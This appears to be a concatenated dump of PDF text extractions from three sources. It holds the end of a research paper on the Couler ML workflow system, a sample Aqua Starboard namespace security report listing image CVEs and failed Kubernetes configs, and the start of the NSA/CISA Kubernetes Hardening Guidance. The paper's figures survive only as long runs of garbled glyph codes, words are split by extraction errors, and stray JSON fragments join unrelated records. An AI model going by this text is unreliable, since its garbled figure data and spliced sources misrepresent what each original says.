/uni00000015/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000015/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000015/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a (b) 20G and 30G\nFig. 15: Effect of C OULER on Resource Utilization and Work-\nflow Execution Time with Different Cache Sizes in Language\nModel Fine-tuning Scenarios\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000001b/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000014/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000001b/uni00000013/uni00000014/uni00000013/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000014/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a\n(a) 10G and 30G\n/uni00000013 /uni00000015/uni00000018 /uni00000018/uni00000013 /uni0000001a/uni00000018 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000015/uni00000018\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000001b/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000015/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a\n/uni00000013 /uni00000015/uni00000018 /uni00000018/uni00000013 /uni0000001a/uni00000018 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000015/uni00000018\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000001b/uni00000013/uni00000014/uni00000013/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000015/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a (b) 20G and 30G\nFig. 16: Effect of C OULER on Resource Utilization and\nWorkflow Execution Time with Different Cache Sizes in\nMultimodal Training Scenarios\nmodel training over CPU and GPU configuration. The cluster\nis a hybrid model with offline and online server computation\nin the same computation node. The reading Pod is configured\nwith an 8 core CPU and 8 GB memory to test the data reading\nthroughput, then the deep learning model is configured with 10\nparameter servers and 20 workers. From Figure 17a, we can\nobserve the cache can improve the data loading performance\ntwice, this confirms the local storage can reduce the cost of\nremote network data accessing.\nSimilarly, we also study the performance of the caching for\nsmall and big file reading. Initially, these files are stored in theremote file system (Alibaba OSS [33] and NAS [29]). For the\nsmall files application, the number of files is more than 10k\nand the total size of files is more than 10GB. The size of a big\nfile is more than 1GB with .zip format, and the total number of\nfiles is more than 10. We test the caching performance based\non the different number of jobs. From Figure 17b, we observe\nthe local cache would improve the data reading speed more\nthan 4 times comparing the data without cache.\n/uni00000044/uni00000047/uni00000056/uni00000042/uni00000044 /uni00000044/uni00000047/uni00000056/uni00000042/uni00000045 /uni00000044/uni00000047/uni00000056/uni00000042/uni00000046 /uni00000044/uni00000047/uni00000056/uni00000042/uni00000047/uni00000013/uni00000018/uni00000014/uni00000013/uni00000014/uni00000018/uni00000015/uni00000013/uni00000015/uni00000018 /uni00000036/uni00000053/uni00000048/uni00000048/uni00000047/uni0000000b/uni00000056/uni00000048/uni00000046/uni00000052/uni00000051/uni00000047/uni00000056/uni0000000c\n/uni00000017/uni00000011/uni0000001c\n/uni00000019/uni00000011/uni00000015\n/uni00000016/uni00000011/uni0000001a\n/uni00000016/uni00000011/uni0000001c/uni00000014/uni00000014/uni00000011/uni00000016\n/uni00000014/uni00000018/uni00000011/uni0000001a\n/uni00000014/uni00000015/uni00000011/uni00000018\n/uni00000015/uni00000013/uni00000011/uni0000001b/uni0000005a/uni00000012/uni00000052/uni00000003/uni00000046/uni00000044/uni00000046/uni0000004b/uni00000048\n/uni0000005a/uni00000003/uni00000046/uni00000044/uni00000046/uni0000004b/uni00000048\n(a) Table cached\n/uni00000056/uni00000050/uni00000044/uni0000004f/uni0000004f /uni00000045/uni0000004c/uni0000004a/uni00000013/uni00000014/uni00000013/uni00000015/uni00000013/uni00000016/uni00000013/uni00000017/uni00000013/uni00000018/uni00000013 /uni00000036/uni00000053/uni00000048/uni00000048/uni00000047/uni0000000b/uni00000056/uni00000048/uni00000046/uni00000052/uni00000051/uni00000047/uni00000056/uni0000000c\n/uni00000016/uni00000014/uni00000011/uni00000013\n/uni00000017/uni0000001c/uni00000011/uni00000013/uni00000016/uni0000001a/uni00000011/uni00000013\n/uni00000017/uni00000013/uni00000011/uni00000013/uni00000014/uni00000015/uni00000011/uni00000013\n/uni00000014/uni00000018/uni00000011/uni00000013/uni00000032/uni00000036/uni00000036\n/uni00000031/uni00000024/uni00000036\n/uni00000032/uni00000036/uni00000036/uni00000010/uni00000026/uni00000044/uni00000046/uni0000004b/uni00000048 (b) File cached\nFig. 17: Performance of data caching\nAPPENDIX E\nPRODUCTION INSIGHTS OF COULER\nOur work is fundamentally motivated by the challenges\nhighlighted in earlier research [53] in Google GCP, specifically\nthe observation of significant computational waste in machine\nlearning (ML) workflows. This previous work provides a\nthorough analysis of 3000 ML production pipelines, reveal-\ning critical insights such as coarse-grained characteristics of\nthese pipelines and the introduction of model graphlets. This\nanalysis identified a crucial problem: a substantial amount\nof computation in these workflows does not lead to model\ndeployment, thereby representing a significant inefficiency.\nThis issue has emerged in our production environment as well,\nand we’ve noted similar observations about the workflow.\nBuilding upon these findings, our contribution is directly\naimed at addressing these inefficiencies. Our work revolves\naround designing a system for unified ML workflow optimiza-\ntion in the cloud. The contributions of our work are multi-\nfaceted: Simplicity and Extensibility, Automation, Efficiency\nand Real-World Impact and Adoption.\nAs for the insights from production in our experimental\nresults, we believe the real-world adoption and application of\nour system within Ant Group and other companies serve as a\ntestament to its practical value and effectiveness in production\nenvironments. The feedback and data obtained from these\nimplementations have been crucial in refining our system\nto ensure it addresses the real-world challenges identified\nin previous studies.For example, the design of the workflow\nbuilding block is as intuitive as procedural coding, inspired\nby real-world application workflow management. Similarly,\nthe issue with large workflows is also driven by practical\napplications. Previously, we assumed that workflow sizes, and\nconsequently the related YAML sizes, would not exceed 2MB.\nHowever, we’ve found that data scientists aim to construct\nvery large workflows with hundreds of nodes and associatedworking procedures. This has directly influenced us to divide\nlarge workflows into smaller ones.\nIn conclusion, our work not only builds on the problems\nidentified in earlier research but also provides tangible, applied\nsolutions that have demonstrated real-world effectiveness. We\nhope this clarifies our contributions and addresses your con-\ncerns." } ]
{ "category": "Provisioning", "file_name": "design_namespace_security_report.pdf", "project_name": "Trivy-Operator", "subcategory": "Security & Compliance" }
[ { "data": "Aqua Starboard Namespace Security Report \nNamespace: sock -shop \nGenerated on 18-FEB-2021 \nTechnical section: \nScanner \nversion \n \nStatistics: \nNumber of containers \nNumber of images \n \nSummary section: \n \nTop 5 vulnerable images by count : \nImage Tag Critical High Other \nweaveworksdemos/carts 0.4.8 9 5 55 \nlibrary/mongo latest 7 0 34 \nweaveworksdemos/catalogue 0.3.5 5 4 21 \nweaveworksdemos/catalogue -db 0.3.0 1 5 20 \nweaveworksdemos/front -end 0.3.12 0 3 17 \n \nTop 5 vulnerabilities by score: \nName Severity Score Affected pods \nCVE-2019 -20920 high 8.1 1 \nCVE-2020 -7788 high 7.3 2 \nCVE-2020 -15999 medium 6.5 1 \nCVE-2020 -1971 medium 5.9 1 \nCVE-2020 -8908 low 3.3 1 \n \nTop 5 failed workload configs: \ntrue Name Severity Category Affected pods \nfalse memoryLimitsMissing warning Resources 10 \nfalse notReadOnlyRootFilesystem warning Security 10 \nfalse livenessProbeMissing warning Health Checks 8 \nfalse runAsRootAllowed warning Security 7 \nfalse cpuRequestsMissing warning Resources 6 \n \n Details section (Do not repeat replicated pods with the same image in the same deployment) \n \nDeployment name: carts \nImage name: weaveworksdemos/carts :0.48 \nVulnerabilities 129 CRITICAL 341 HIGH 393 MEDIUM 47 LOW \nFailed Configs 2 Danger 10 Severe 15 Warning \n \nOnly critical and high vulnerabilities \nID Severity Resource Installed Version Fixed Version \nCVE-2018 -1312 CRITICAL apache2 -data 2.4.10 -10+deb8u7 2.4.10 -10+deb8u12 \n…. \n \nOnly failed configs \nPASS ID Severity Category \nfalse cpuLimitsMissing warning Resources \n…. \n \n=============== \n… More details section of other deployments/images. " } ]
{ "category": "Provisioning", "file_name": "NSA_Kubernetes_Hardening_Guidance_1.0.pdf", "project_name": "Trivy-Operator", "subcategory": "Security & Compliance" }
[ { "data": " \n \n \n \nNational Security Agency \nCybersecurity and Infrastructure Security Agency \n \nCybersecurity Technical Report \n \n \n \n \n \nKubernetes Hardening Guidance \n \n \n \n \n \n \n \nAugust 2021 \nS/N U/OO/168286 -21 \nPP-21-1104 \nVersion 1.0 \n \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 ii \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nNotices and history \nDocument change history \nDate Version Description \nAugust 2021 1.0 Initial release \nDisclaimer of warranties and endorsement \nThe information and opinions contained in this document are provided \"as is\" and \nwithout any warranties or guarantees. Reference herein to any specific commercial \nproducts, process, or service by trade name, trademark, manufacturer, or otherwise, \ndoes not necessarily constitute or imply its endorsement, recommendation, or favoring \nby the United States Government, and this guidance shall not be used for advertising or \nproduct endorsement purposes. \nTrademark recognition \nKubernetes is a registered trademark of The Linux Foundation. ▪ SELinux is a registered \ntrademark of the National Security Agency. ▪ AppArmor is a registered trademark of \nSUSE LLC. ▪ Windows and Hyper -V are registered trademarks of Microsoft Corporation. \n▪ ETCD is a registered trademark of Co reOS, Inc. ▪ Syslog -ng is a registered trademark \nof One Identity Software International Designated Activity Company. ▪ Prometheus is a \nregistered trademark of The Linux Foundation. ▪ Grafana is a registered trademark of \nRaintank, Inc. dba Grafana Labs ▪ Elasticsearch and ELK S tack are registered \ntrademarks of Elasticsearch B.V. \nCopyright recognition \nInformation, examples, and figures in this document are based on Kubernetes \nDocumentation by The Kubernetes Authors , published under a Creative Commons \nAttribution 4.0 l icense . \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 iii \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nPublication information \nAuthor(s) \nNational Security Agency (NSA) \nCybersecurity Directorate \nEndpoint Security \nCybersecurity and Infrastructure Security Agency (CISA) \nContact information \nClient Requirements / General Cybersecurity Inquiries: \nCybersecurity Requirements Center, 410 -854-4200, Cybersecurity_Requests@nsa.gov \n \nMedia i nquiries / Press Desk: \nMedia Relations, 443 -634-0721, MediaRelations@nsa.gov \n \nFor incident response resources, contact CISA at CISAServiceDesk@cisa.dhs.gov . \nPurpose \nNSA and CISA developed this document in furtherance of their respective cybersecurity \nmissions , including their responsibilities to develop and issue cybersecurity \nspecifications and mitigations. This information may be shared broadly to reach all \nappropriate stakeholders. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 iv \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nExecutive summary \nKubernetes® is an open -source system that automates the deployment, scalin g, and \nmanagement of applications run in containers , and is often hosted in a cloud \nenvironment . Using this type of virtualized infrastructure can provide several flexibility \nand security benefits compared to traditional, monolithic software platforms. However, \nsecurely managing everything from microservices to the underlying infrastructure \nintroduces other complexities . The hardening guidance detailed in this report is \ndesigned to help organizations handle associated risks and enjoy the benefits of using \nthis technology. \nThree common sources of compromise in Kubernetes are supply chain risk s, malicious \nthreat actors, and i nsider threats . \nSupply chain risks are often challenging to mitigate and can arise in the container build \ncycle or infrastructure acquisi tion. Malicious threat actors can exploit vulnerabilities and \nmisconfigurations in components of the Kubernetes architecture , such as the control \nplane, worker nodes, or containerized applications. Insider threats can be \nadministrators, users, or cloud service providers. Insiders with special access to an \norganization’s Kubernetes infrastructure may be able to abuse these privil eges. \nThis guidance describes the security challenges associated with setting up and securing \na Kubernetes cluster. It includes h ardening strategies to avoid common \nmisconfigurations and guide system administrators and developers of National Security \nSyste ms on how to deploy Kubernetes with example configurations for the \nrecommended hardening measures and mitigations . This guidance details the following \nmitigations: \n Scan containers and Pods for vulnerabilities or misconfigurations . \n Run containers and Pods w ith the least privileges possible. \n Use network separation to control the amount of damage a compromise can \ncause . \n Use firewalls to limit unneeded network connectivity and encryption to protect \nconfidentiality . \n Use strong authentication and authorization to limit user and administrator \naccess as well as to limit the attack surface. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 v \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \n Use log auditing so that administrators can monitor activity and be alerted to \npotential malicious activity. \n Periodic ally review all Kubernetes settings and use vulnerability scans to help \nensure risks are appropriate ly accounted for and security patches are applied . \nFor additional security hardening guidance , see the Center for Internet Security \nKubernetes benchmarks, the Docker and Kubernetes Security Technical \nImplementation Guides, the Cybersecurity and Infrastructure Security Agency (CISA) \nanalysis report, and Kubernetes documentation [1], [2], [3], [6]. \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 vi \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nContents \nKubernetes Hardening Guidance …………………………………………………….. i \nExecutive summary ................................ ................................ ................................ ................. iv \nIntroduction ................................ ................................ ................................ ............................... 1 \nRecommendations ................................ ................................ ................................ ................... 2 \nArchitectural overview ................................ ................................ ................................ ............. 3 \nThreat model ................................ ................................ ................................ ............................. 5 \nKubernetes Pod security ................................ ................................ ................................ .......... 7 \n“Non -root” containers and “rootless” container engines ................................ ........................... 7 \nImmutable container file systems ................................ ................................ ............................. 8 \nBuilding secure container images ................................ ................................ ............................ 8 \nPod Security Policies ................................ ................................ ................................ ............. 10 \nProtecting Pod service account tokens ................................ ................................ .................. 11 \nHardening container engines ................................ ................................ ................................ . 12 \nNetwork separation and hardening ................................ ................................ ....................... 13 \nNamespaces ................................ ................................ ................................ ......................... 13 \nNetwork policies ................................ ................................ ................................ .................... 14 \nResource policie s ................................ ................................ ................................ .................. 14 \nControl plane hardening ................................ ................................ ................................ ........ 15 \nEtcd ................................ ................................ ................................ ................................ ... 16 \nKubeconfig Files ................................ ................................ ................................ ................ 16 \nWorker node segmentation ................................ ................................ ................................ .... 16 \nEncrypti on ................................ ................................ ................................ ............................. 17 \nSecrets ................................ ................................ ................................ ................................ .. 17 \nProtecting sensitive cloud infrastructure ................................ ................................ ................ 18 \nAuthentication and authorization ................................ ................................ .......................... 18 \nAuthentication ................................ ................................ ................................ ........................ 19 \nRole-based a ccess control ................................ ................................ ................................ .... 20 \nLog auditing ................................ ................................ ................................ ............................ 22 \nLogging ................................ ................................ ................................ ................................ . 22 \nKubernetes native audit lo gging configuration ................................ ................................ .... 24 \nWorker node and container logging ................................ ................................ ................... 25 \nSeccomp: audit mode ................................ ................................ ................................ ........ 26 \nSYSLOG ................................ ................................ ................................ ............................ 27 \nSIEM platforms ................................ ................................ ................................ ...................... 27 \nAlerting ................................ ................................ ................................ ................................ .. 28 \nService meshes ................................ ................................ ................................ ..................... 29 \nFault tolerance ................................ ................................ ................................ ....................... 30 \nTools ................................ ................................ ................................ ................................ ..... 31 \nUpgrading and application security practices ................................ ................................ ...... 32 \nWorks cited ................................ ................................ ................................ ............................. 33 \nAppendix A: Example Do ckerfile for non -root application ................................ .................. 34 \nAppendix B: Example deployment template for read -only file systemfilesystem .............. 35 \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 vii \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix C: Example Pod Security Policy ................................ ................................ ........... 36 \nAppendix D: Example namespace ................................ ................................ ......................... 38 \nAppendix E: Example network policy ................................ ................................ .................... 39 \nAppendix F: Example LimitRange ................................ ................................ ......................... 40 \nAppendix G: Example ResourceQuota ................................ ................................ .................. 41 \nAppendix H: Example encryption ................................ ................................ .......................... 42 \nAppendix I: Example KMS configuration ................................ ................................ .............. 43 \nAppendix J: Example pod -reader RBAC Role ................................ ................................ ....... 45 \nAppendix K: Example RBAC RoleBinding and ClusterRoleBinding ................................ ... 46 \nAppendix L: Audit Policy ................................ ................................ ................................ ........ 48 \nAppendix M: Example flags with which to submit Audit Policy file to kube -apiserver ...... 49 \nAppendix N: Webhook conf iguration ................................ ................................ .................... 51 \n \nFigures \nFigure 1: High -level view of Kubernetes cluster components ................................ .............. 1 \nFigure 2: Kubernetes architecture ................................ ................................ .......................... 3 \nFigure 3: Pod components with sidecar proxy as logging container ................................ ... 7 \nFigure 4: A container build workflow , optimized with webhook and admission controller 9 \nFigure 5: Cluster leveraging service mesh to integrate logging with network secu rity .....30 \nTables \nTable I: Pod Security Policy components ................................ ................................ ............. 10 \nTable II: Control plane ports ................................ ................................ ................................ ...15 \nTable III: Worker node ports ................................ ................................ ................................ ...17 \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 1 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nIntroduction \nKubernetes, frequently abbreviated “K8s”, is an open -source container -orchestration \nsystem used to automate deploying, scaling, and managing containerized applications. \nIt manages all elements that make up a cluster, from each microservice in an \napplication to entire clusters. Using containerized applic ations as microservices can \nprovide more flexibility and security benefits compared to monolithic software platforms , \nbut also can introduce other complexities . \n \nFigure 1: High -level view of Kubernetes cluster components \nThis gu idance focuses on security challenges and suggests hardening strategies where \npossible that are applicable to administrators of National Security Systems and critical \ninfrastructure . Although this guidance is tailored to National Security Systems and \ncritical infrastructure organizations , administrators of federal and state, local, tribal, and \nterritorial (SLTT) government networks are also encouraged to implement the \nrecommendations provided. Kubernetes clusters can be complex to secure and are \noften abused in compromises that exploit their misconfigurations. The following \nguidance offers specific security configurations that can help build more secure \nKubernetes clusters. \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 2 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nRecommendations \nA summary of the key recommendations from each section are: \n Kubernetes Pod security \n Use containers built to run applications as non -root users \n Where possible, run containers with immutable file systems \n Scan container images for possible vulnerabilities or misconfigurations \n Use a Pod Security Policy to enforce a min imum level of security \nincluding : \n Preventing privileged containers \n Denying container features frequently exploited to breakout, such \nas hostPID, hostIPC, hostNetwork, allowedHostPath \n Rejecting containers that execute as the root user or allow \nelevation to root \n Hardening applications against exploitation using security services \nsuch as SELinux®, AppArmor®, and seccomp \n Network separation and hardening \n Lock down access to control plane nodes using a firewal l and role -based \naccess control (RBAC) \n Further limit a ccess to the Kubernetes etcd server \n Configure control plane components to use authenticated, encrypted \ncommunications using Transport Layer Security (TLS) certificates \n Set up network policies to isolate resources. Pods and services in different \nnamespaces can still communicate with each other unless additional \nseparation is enforced, such as network policies \n Place all credentials and sensitive information in Kubernetes Secrets \nrather than in configuration files. Encrypt Secrets using a strong \nencryption met hod \n Authentication and authorization \n Disable anonymous login (enabled by default) \n Use strong user authentication \n Create RBAC policies to limit administrator, user, and service account \nactivity \n Log auditing \n Enable audit logging (disabled by default) \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 3 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \n Persist logs to ensure availability in the case of node, Pod, or container \nlevel failure \n Configure a metrics logg er \n Upgrading and application security practices \n Immediately apply security patches and updates \n Perform periodic vulnerability scans and penetration te sts \n Remove components from the environment when they are no longer \nneeded \nArchitectural overview \nKubernetes uses a cluster architecture. A Kubernetes cluster is comprised of a number \nof control plane s and one or more physical or virtual machines called worker nodes. The \nworker nodes host Pods, which contain one or more containers. The container is the \nexecutable image that contains a software package and all its dependencies. See \nFigure 2 : Kubernetes architecture. \n \nFigure 2: Kubernetes architecture 1 \nThe control plane makes decisions about the cluster . This includes scheduling \ncontainers to run , detecting /responding to failures , and starting new Pods when the \n \n1 Kubernetes Components by SupriyaSurbi and Fale used under CC BY 4.0 \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 4 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nnumber of replicas listed in a deployment file is unsatisfied. The fo llowing logical \ncomponents are all part of the control plane: \n Controller manager (Default Port: 10252) - monitors the Kubernetes cluster to \ndetect and maintain several aspects of the Kubernetes environment including \njoining Pods to services, maintaining th e correct number of Pods in a set, and \nresponding to the loss of nodes. \n Cloud controller manager (Default Port: 10258 ) - an optional component used \nfor cloud -based deployments. The cloud controller interfaces with the Cloud \nService Provider to manage load balancers and virt ual networking for the cluster. \n Kubernetes Application Programing Interface ( API) Server (Default Port: \n6443 or 8080) - the interface through which administrators direct Kubernetes. As \nsuch, the API server is typically exposed outside of the control plane. The API \nServer is designed to scale and may exist on multiple control plane nodes. \n Etcd® (Default Port Range: 2379 -2380) - the persistent backing store where all \ninformation regarding the state of the cluster is kept. Etcd is not intende d to be \nmanipulated directly but should be managed through the API Server. \n Scheduler (Default Port: 10251) - tracks the status of worker nodes and \ndetermines where to run Pods. Kube -scheduler is intended to be accessible only \nfrom nodes within the control plane. \nKubernetes worker nodes are physical or virtual machines dedicate d to running \ncontainerized applications for the cluster. In addition to running a container engine, \nworker nodes host the following two services that allow orchestration from the con trol \nplane : \n Kubelet (Default Port: 10251) - runs on each worker node to orchestrate and \nverify Pod execution . \n Kube -proxy - a network proxy that uses the host ’s packet filtering capability to \nensure correct packet routing in the Kubernetes cluster. \nClust ers are commonly hosted using a cloud service provider (CSP) Kubernetes service \nor on-premises . When designing a Kubernetes environment , organizations should \nunderstand their responsibilities in securely maintaining the cluster . CSPs administer \nmost aspects of managed Kubernetes services, but the organization may need to \nhandle some aspects, such as authentication and authorization . \n▲Return to Contents \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 5 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nThreat model \nKubernetes can be a valuable target for data and/or comput e power theft. While data \ntheft is traditionally the primary motivation, cyber actors seeking computational power \n(often for cryptocurrency mining) are also drawn to Kubernetes to harness the \nunderlying infrastructure. In addition to resource theft, cyber actors may also target \nKubernetes to cause a denial of service. The following threats represent some of the \nmost likely sources of compromise for a Kube rnetes cluster: \n Supply Chain Risk - Attack vectors to the supply chain are diverse and \nchallenging to mi tigate. Supply chain risk is the risk that an adversary may \nsubvert any element that makes up a system, including product components, \nservices, or personnel that help supply the end product. This can include third -\nparty software and vendors used to create and manage the Kubernetes cluster. \nSupply chain compromises can affect Kubernete s at multiple levels including: \n Container/Application level - The security of applications running in \nKubernetes and their third -party dependencies relies on the \ntrustworthines s of the developers and the defense of the development \ninfrastructure. A malicious container or application from a third party could \nprovide cyber actors with a foothold in the cluster. \n Infrastructure - The underlying systems hosting Kubernetes have their \nown software and hardware dependencies. Any compromise of systems \nused as worker nodes or as part of the control plane could provide cyber \nactors with a foothold in the cluster. \n Malicious Threat Actor - Malicious actors often exploit vulnerabilities to gain \naccess from a remote location. Kubernetes architecture exposes several APIs \nthat cyber actors could potentially leverage for remote exploitation. \n Control plane - The Kubernetes control plane has a vari ety of components \nthat communicate to track and manage the cluster . Cyber actors \nfrequently take advantage of exposed control plane components lacking \nappropriate access controls. \n Worker nodes - In addition to running a container engine, worker nodes \nhost the kubelet and kube -proxy service, which are potentially exploitable \nby cyber actors . Additionally, worker nodes exist outside of the locked -\ndown control plane and may be more accessible to cyber actors . \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 6 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \n Containerized application s - Applications running inside the cluster are \ncommon targets . Applications are frequently accessible outside of the \ncluster , making them reachable by remote cyber actors . An actor can then \npivot from an already compromised Pod or escalate privileges within the \ncluster using an exposed application’s internally accessible resources . \n Insider Threat - Threat actors can exploit vulnerabilities or use privileges given \nto the individual while working within the organization. Individuals from within the \norganization are given special knowledge and privileges that can be used against \nKubernetes clusters. \n Administrator - Kubernetes administrators have control over running \ncontainers , including the ability to execute arbitrary commands inside \ncontainerized environments . Kubernete s-enforced RBAC authorization \ncan help reduce the risk by restricting access to sensitive capabilities . \nHowever, because Kubernetes lacks two-person integrity controls , there \nmust be at least one administrative account capable of gaining control of \nthe clu ster. Administrators often have physical access to the systems or \nhypervisors, which could also be used to compromise the Kubernetes \nenvironment. \n User - Containerized application users may have knowledge and \ncredentials to access containerized services in the Kubernetes cluster. \nThis level of access could provide sufficient means to exploit either the \napplication itself or other cluster components. \n Cloud Service or Infrastructure Provider - Access to physical systems or \nhypervisor s managing Kubernetes node s could be used to compromise a \nKubernetes environment. Cloud Service Providers often have layers of \ntechnical and administrative controls to protect systems from privileged \nadministrators. \n \n▲Return to Contents \n \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 7 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nKubernetes Pod security \nPods are the smallest deployable Kubernetes unit and consist of one or more \ncontainers. Pods are often a cyber actor ’s initial execution environment upon exploiting \na container . For this reason, Pods should be hardened to make exploitation mor e \ndifficult and to limit the impa ct of a successful compromise. \n \nFigure 3: Pod components with sidecar proxy as logging container \n“Non-root” containers and “ rootless” container engines \nBy default, many container services run as the privileged root user, and applications \nexecute inside the container as root despite not requiring privileged execution. \nPreventing root execution by using non -root containers or a rootless container engine \nlimits the impact of a container compromise . Both of these methods affect the runtime \nenvironment significantly, so applications should be thoroughly tested to ensure \ncompatibility. \nNon-root containers : container engines allow containers to run applications a s a \nnon-root user with non -root group membership. Typically, this non -default setting is \nconfigured when the container image is built. Appendix A : Example Dockerfile for \nnon-root application shows an example Dockerfile that runs an application as a \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 8 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nnon-root user. Alternatively, Kubernetes can load containers into a Pod with \nSecurityContext:runAsUser specifying a non -zero user. Whi le the runAsUser \ndirective effectively force s non-root execution at 